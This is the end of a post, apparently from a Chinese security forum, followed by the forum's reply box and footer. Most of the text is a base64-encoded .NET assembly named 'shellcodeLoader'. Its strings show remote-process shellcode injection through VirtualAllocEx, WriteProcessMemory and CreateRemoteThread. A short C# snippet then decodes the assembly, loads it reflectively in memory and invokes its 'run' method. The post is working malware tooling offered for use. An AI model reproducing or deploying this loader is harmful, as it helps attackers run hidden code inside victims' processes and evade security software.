AUACgUAAAYAwwUCAAcAIgEAAAEA1AEAAAEAtQEAAAEA0wUAAAEAjQYJABYFAQARABYFBgAZABYFCgApABYFEAAxABYFEAA5ABYFEABBABYFEABJABYFEABRABYFEABZABYFEABhABYFFQBpABYFEABxABYFEAB5ABYFEACJABYFGgCRABYFBgCpABYFBgDBAHkGKAChABYFLQCZACcENADJADcGOADRANkBNADJAEABPgDZAAcERACZABYFBgC5AI8FVwC5AHsBXQDhAJgBNADJANgFYgC5AKUBNADpAOIBZwC5ABsBbADxACcENADpAOIBcAC5AGgBfgD5AMsEggDJADsEbADJAP0FiwABAScENAAIAAgAmQAIAAwAngAIABAAowAIABQAqAAIABgArQAIABwAsgAIACAAtwAIACQAvAAIACgAwQAIACwAxgAJADQAywAJADgA0AAJADwA1QAJAEAA2gAJAEQA3wAJAEgA5AAJAEwA6QAJAFAA7gAJAFQA8wAJAFgA+AAJAFwA/QAJAGQAmQAJAGgA6QAJAGwAAgEnAIMA3wAuAAsA8gEuABMA+wEuABsAGgIuACMAIwIuACsAOAIuADMAOAIuADsAOAIuAEMAIwIuAEsAPgIuAFMAOAIuAFsAOAIuAGMAVgIuAGsAgAIuAHMAjQLDAIsA3wDjAIsA3wADAYsA3wAIAAYABwEgAEoAdACFAFgEQQEJAJ8GAQAAAQsArgYBAAABDQAtAQEABIAAAAEAAAAAAAAAAAAAAAAA8QQAAAQAAAAAAAAAAAAAAJAAEgEAAAAABAAAAAAAAAAAAAAAkABlBAAAAAAGAAMABwADAAgAAwAAAAAAAEludDMyADxNb2R1bGU+AFBBR0VfRVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUEFHRV9HVUFSRABQQUdFX05PQ0FDSEUAUEFHRV9XUklURUNPTUJJTkUAUEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQBQQUdFX0VYRUNVVEUATk9STUFMAE5VTEwAU1RBQ0tfU0laRV9QQVJBTV9JU19BX1JFU0VSVkFUSU9OAFN5c3RlbS5JTwBQQUdFX05PQUNDRVNTAFBBR0VfUkVBRE9OTFkAUEFHRV9XUklURUNPUFkAUEFHRV9FWEVDVVRFX1dSSVRFQ09QWQB2YWx1ZV9fAG1zY29ybGliAGdldF9JZABscFRocmVhZElkAENyZWF0ZVJlbW90ZVRocmVhZABSZXBsYWNlAEdldEJhc2U2NFNoZWxsY29kZQBHZXRTaGVsbGNvZGUAZ2V0X0hhbmRsZQBDb25zb2xlAGdldF9NYWluTW9kdWxlAFByb2Nlc3NNb2R1bGUAZ2V0X0ZpbGVOYW1lAGdldF9Qcm9jZXNzTmFtZQBwcm9jZXNzbmFtZQBQaWNrZWRQcm9jZXNzSW5mb0J5bmFtZQBSZWFkTGluZQBXcml0ZUxpbmUAZmxBbGxvY2F0aW9uVHlwZQBSZWxlYXNlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFJlc2VydmUAc2hlbGxjb2RlTG9hZGVyLmV4ZQBkd1N0YWNrU2l6ZQBuU2l6ZQBkd1NpemUARW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFJldmVyc2FsU3RyaW5nAFRvU3RyaW5nAFdyaXRlV2F0Y2gAZ2V0X0xlbmd0aABQaHlzaWNhbABSZXZlcnNhbABrZXJuZWwzMi5kbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBNYWluAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAE1lbW9yeVByb3RlY3Rpb24AcnVuAFRvcERvd24AWmVybwBwcm8AQ2hhcgBTdHJlYW1SZWFkZXIAVGV4dFJlYWRlcgBzaGVsbGNvZGVMb2FkZXIAbHBCdWZmZXIAbHBQYXJhbWV0ZXIALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBMYXJnZVBhZ2VzAEdldFByb2Nlc3NlcwBscFRocmVhZEF0dHJpYnV0ZXMAVGhyZWFkQ3JlYXRpb25GbGFncwBkd0NyZWF0aW9uRmxhZ3MAYXJncwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAZ2V0X0NoYXJzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAVGFyZ2V0UHJvY2Vzc0luamVjdABmbFByb3RlY3QAUmVzZXQAQ29tbWl0AERlY29tbWl0AGdldF9EZWZhdWx0AENvbnZlcnQAaW5wdXQAU3lzdGVtLlRleHQAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNzTWVtb3J5AFN5c3RlbS5TZWN1cml0eQAAAAAAJ2IAYQBzAGUANgA0AHMAaABlAGwAbABjAG8AZABlAC4AdAB4AHQAAAEAD2EAYgBjAGQAZQBmAGcAABFbACsAXQBOAGEAbQBlADoAAAtQAGEAdABoADoAAAdJAEQAOgAAF1sALQBdAKFsCWd+YjBS7nYHaNuPC3oBPVsAKgBdAO9T5U4dXNWLu1OJYw5UAH8sAItPglljAGEAbABjAC4AZQB4AGUAu1OJYy4AZQB4AGUA5WfiiwEDMQAAADE6rEtdqvxLp4vgGlyQdpAABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQQcHBBJRDg4OBAAAEmEGIAIBDhJhAyAADgUAAg4ODgUgAg4ODgUAAR0FDgwHBg4dEl0IEl0IEl0FAAAdEl0EIAAScQQgAQIOB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3NvZnQtY29tOmFzbS52MyI+DQogICAgICAgIDwhLS0gVUFDIOa4heWNlemAiemhuQogICAgICAgICAgICAg5aaC5p6c5oOz6KaB5pu05pS5IFdpbmRvd3Mg55So5oi35biQ5oi35o6n5Yi257qn5Yir77yM6K+35L2/55SoCiAgICAgICAgICAgICDku6XkuIvoioLngrnkuYvkuIDmm7/mjaIgcmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwg6IqC54K544CCbgogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCAgbGV2ZWw9ImFzSW52b2tlciIgdWlBY2Nlc3M9ImZhbHNlIiAvPgogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCAgbGV2ZWw9InJlcXVpcmVBZG1pbmlzdHJhdG9yIiB1aUFjY2Vzcz0iZmFsc2UiIC8+CiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsICBsZXZlbD0iaGlnaGVzdEF2YWlsYWJsZSIgdWlBY2Nlc3M9ImZhbHNlIiAvPgoKICAgICAgICAgICAg5oyH5a6aIHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIOWFg+e0oOWwhuemgeeUqOaWh+S7tuWSjOazqOWGjOihqOiZmuaLn+WMluOAggogICAgICAgICAgICDlpoLmnpzkvaDnmoTlupTnlKjnqIvluo/pnIDopoHmraTomZrmi5/ljJbmnaXlrp7njrDlkJHlkI7lhbzlrrnmgKfvvIzliJnliKDpmaTmraQKICAgICAgICAgICAg5YWD57Sg44CCCiAgICAgICAgLS0+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiIC8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgICA8YXBwbGljYXRpb25SZXF1ZXN0TWluaW11bT4NCiAgICAgICAgPGRlZmF1bHRBc3NlbWJseVJlcXVlc3QgcGVybWlzc2lvblNldFJlZmVyZW5jZT0iQ3VzdG9tIiAvPg0KICAgICAgICA8UGVybWlzc2lvblNldCBjbGFzcz0iU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb25TZXQiIHZlcnNpb249IjEiIFVucmVzdHJpY3RlZD0idHJ1ZSIgSUQ9IkN1c3RvbSIgU2FtZVNpdGU9InNpdGUiIC8+DQogICAgICA8L2FwcGxpY2F0aW9uUmVxdWVzdE1pbmltdW0+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQogIDxjb21wYXRpYmlsaXR5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmNvbXBhdGliaWxpdHkudjEiPg0KICAgIDxhcHBsaWNhdGlvbj4NCiAgICAgIDwhLS0g6K6+6K6h5q2k5bqU55So56iL5bqP5LiO5YW25LiA6LW35bel5L2c5LiU5bey6ZKI5a+55q2k5bqU55So56iL5bqP6L+b6KGM5rWL6K+V55qECiAgICAgICAgICAgV2luZG93cyDniYjmnKznmoTliJfooajjgILlj5bmtojor4TorrrpgILlvZPnmoTlhYPntKDvvIwKICAgICAgICAgICBXaW5kb3dzIOWwhuiHquWKqOmAieaLqeacgOWFvOWuueeahOeOr+Wig+OAgiAtLT4NCiAgICAgIDwhLS0gV2luZG93cyBWaXN0YSAtLT4NCiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9IntlMjAxMTQ1Ny0xNTQ2LTQzYzUtYTVmZS0wMDhkZWVlM2QzZjB9IiAvPi0tPg0KICAgICAgPCEtLSBXaW5kb3dzIDcgLS0+DQogICAgICA8IS0tPHN1cHBvcnRlZE9TIElkPSJ7MzUxMzhiOWEtNWQ5Ni00ZmJkLThlMmQtYTI0NDAyMjVmOTNhfSIgLz4tLT4NCiAgICAgIDwhLS0gV2luZG93cyA4IC0tPg0KICAgICAgPCEtLTxzdXBwb3J0ZWRPUyBJZD0iezRhMmYyOGUzLTUzYjktNDQ0MS1iYTljLWQ2OWQ0YTRhNmUzOH0iIC8+LS0+DQogICAgICA8IS0tIFdpbmRvd3MgOC4xIC0tPg0KICAgICAgPCEtLTxzdXBwb3J0ZWRPUyBJZD0iezFmNjc2Yzc2LTgwZTEtNDIzOS05NWJiLTgzZDBmNmQwZGE3OH0iIC8+LS0+DQogICAgICA8IS0tIFdpbmRvd3MgMTAgLS0+DQogICAgICA8IS0tPHN1cHBvcnRlZE9TIElkPSJ7OGUwZjdhMTItYmZiMy00ZmU4LWI5YTUtNDhmZDUwYTE1YTlhfSIgLz4tLT4NCiAgICA8L2FwcGxpY2F0aW9uPg0KICA8L2NvbXBhdGliaWxpdHk+DQogIDwhLS0g5oyH56S66K+l5bqU55So56iL5bqP5Y+v5oSf55+lIERQSSDkuJQgV2luZG93cyDlnKggRFBJIOi+g+mrmOaXtuWwhuS4jeS8muWvueWFtui/m+ihjAogICAgICAg6Ieq5Yqo57yp5pS+44CCV2luZG93cyBQcmVzZW50YXRpb24gRm91bmRhdGlvbiAoV1BGKeW6lOeUqOeoi+W6j+iHquWKqOaEn+efpSBEUEnvvIzml6DpnIAKICAgICAgIOmAieaLqeWKoOWFpeOAgumAieaLqeWKoOWFpeatpOiuvue9rueahCBXaW5kb3dzIOeql+S9k+W6lOeUqOeoi+W6jyjpnaLlkJEgLk5FVCBGcmFtZXdvcmsgNC42Kei/mOW6lAogICAgICAg5Zyo5YW2IGFwcC5jb25maWcg5Lit5bCGICJFbmFibGVXaW5kb3dzRm9ybXNIaWdoRHBpQXV0b1Jlc2l6aW5nIiDorr7nva7orr7nva7kuLogInRydWUi44CCCiAgICAgICAKICAgICAgIOWwhuW6lOeUqOeoi+W6j+iuvuS4uuaEn+efpemVv+i3r+W+hOOAguivt+WPgumYhSBodHRwczovL2RvY3MubWljcm9zb2Z0LmNvbS93aW5kb3dzL3dpbjMyL2ZpbGVpby9tYXhpbXVtLWZpbGUtcGF0aC1saW1pdGF0aW9uIC0tPg0KICA8IS0tCiAgPGFwcGxpY2F0aW9uIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+CiAgICA8d2luZG93c1NldHRpbmdzPgogICAgICA8ZHBpQXdhcmUgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vU01JLzIwMDUvV2luZG93c1NldHRpbmdzIj50cnVlPC9kcGlBd2FyZT4KICAgICAgPGxvbmdQYXRoQXdhcmUgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vU01JLzIwMTYvV2luZG93c1NldHRpbmdzIj50cnVlPC9sb25nUGF0aEF3YXJlPgogICAgPC93aW5kb3dzU2V0dGluZ3M+CiAgPC9hcHBsaWNhdGlvbj4KICAtLT4NCiAgPCEtLSDlkK/nlKggV2luZG93cyDlhazlhbHmjqfku7blkozlr7nor53moYbnmoTkuLvpopgoV2luZG93cyBYUCDlkozmm7Tpq5jniYjmnKwpIC0tPg0KICA8IS0tCiAgPGRlcGVuZGVuY3k+CiAgICA8ZGVwZW5kZW50QXNzZW1ibHk+CiAgICAgIDxhc3NlbWJseUlkZW50aXR5CiAgICAgICAgICB0eXBlPSJ3aW4zMiIKICAgICAgICAgIG5hbWU9Ik1pY3Jvc29mdC5XaW5kb3dzLkNvbW1vbi1Db250cm9scyIKICAgICAgICAgIHZlcnNpb249IjYuMC4wLjAiCiAgICAgICAgICBwcm9jZXNzb3JBcmNoaXRlY3R1cmU9IioiCiAgICAgICAgICBwdWJsaWNLZXlUb2tlbj0iNjU5NWI2NDE0NGNjZjFkZiIKICAgICAgICAgIGxhbmd1YWdlPSIqIgogICAgICAgIC8+CiAgICA8L2RlcGVuZGVudEFzc2VtYmx5PgogIDwvZGVwZW5kZW5jeT4KICAtLT4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAENAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
  15. ";
  16.             byte[] Buffer = Convert.FromBase64String(base64string);
  17.             Assembly assembly = Assembly.Load(Buffer);
  18.             Type type = assembly.GetType("shellcodeLoader.TargetProcessInject");
  19.             MethodInfo method = type.GetMethod("run");
  20.             Object obj = assembly.CreateInstance(method.Name);
  21.             method.Invoke(obj, null);
  22.         }
  23.     }
  24. }
复制代码







回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 04:21 , Processed in 0.014658 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表